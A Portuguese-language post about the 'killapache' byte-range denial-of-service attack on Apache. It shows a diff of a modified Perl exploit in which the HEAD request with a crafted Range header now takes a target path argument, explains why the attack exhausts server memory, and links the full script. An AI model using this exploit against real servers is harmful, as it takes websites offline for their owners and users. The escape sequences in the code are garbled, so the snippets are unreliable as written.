Test Part - para realizar o teste, você precisa utilizar o conteúdo estático do site, talvez imagens, texto, html, doc, etc, e Xploiting Part.
Diferença Existentes entre Velho e Novo Exploit Modificado:
40c40
$p = "HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn"; $p = "HEAD".($ARGV[2] ? $ARGV[2] : "/")."HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn";
56c56
$p = "HEAD / HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn"; $p = "HEAD".($ARGV[2] ? $ARGV[2] : "/") ."HTTP/1.1rnHost: $ARGV[0]rnRange:bytes=0-$prnAccept-Encoding: gziprnConnection: closernrn";
73c73
if ($#ARGV > 1) {
if ($#ARGV > 0) {
Lembrando que o killapache envia requisições GET com vários "byte ranges", que vão reivindicar grandes porções de espaço de memória do sistema. Os "byte ranges" permitem que um browser possa carregar apenas certas partes de um documento, como por exemplo, bytes de 500-1000.
Esse procedimento é normalmente utilizado quando realizam download de arquivos muito grandes. O método é usado por programas como clientes de download, para retomar processos que teriam sido interrompidos, e projetado para reduzir os requisitos de largura de banda. No entanto, parece que a menção dos múltiplos componentes indiferenciados no header, pode causar um mau funcionamento no servidor Apache.
Até o momento, não há patch lançado ainda para esta vulnerabilidade abordada, mas um intenso trabalho em torno disso, vem sendo discutido desde uma postagem liberada anteriormente. Estes têm sido postados pela The Apache Software Foundation, e podem ser utilizados até que uma correção estável seja liberada.
Saiba Mais:
[1] Pastebin http://pastebin.com/gWB76qmj